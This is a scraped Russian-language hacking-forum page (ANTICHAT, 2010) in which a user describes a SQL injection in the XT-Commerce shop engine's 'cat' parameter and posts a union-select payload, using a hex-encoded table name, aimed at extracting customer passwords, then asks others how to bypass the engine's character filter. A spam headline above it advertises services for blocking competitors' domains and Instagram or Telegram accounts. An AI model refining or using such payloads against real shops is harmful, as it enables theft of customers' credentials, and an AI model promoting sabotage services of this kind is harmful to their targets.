УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
XT-Commerce

Опции темы

Поиск в этой теме

Опции просмотра

22.09.2010, 21:47

Star_s

Новичок

Регистрация: 04.02.2010

Сообщений: 13

Провел на форуме:
72930

Репутация: 0

Всем привет!

В движке XT-Commerce есть уязвимость - SQL-injection:

Цитата:

Сообщение от None

http://site.com/index.php?cat=
SQL-inj

Но, т.к. генерируемые самим движком ссылки имеют примерно такой вид:

Цитата:

Сообщение от None

http://site.com/index.php?cat=
с
197

Цитата:

Сообщение от None

http://site.com/index.php?cPath=197
_
6694

т.е. содержат символы с и _, то скрипт их вырезает. Поэтому нельзя, например сделать выборку из таблицы, в имени которой есть буква с или _.

Пробовал обойти это, заюзав переменные, вроде:

Цитата:

Сообщение от None

http://site.com/index.php?cat=-1+union+select+(@a:=0x637573746F6D657273),2,3,pass word+from+@a%23

0x637573746F6D657273=(customers)

Но этот номер не прокатывает.

Кто-нибудь знает, как можно обойти?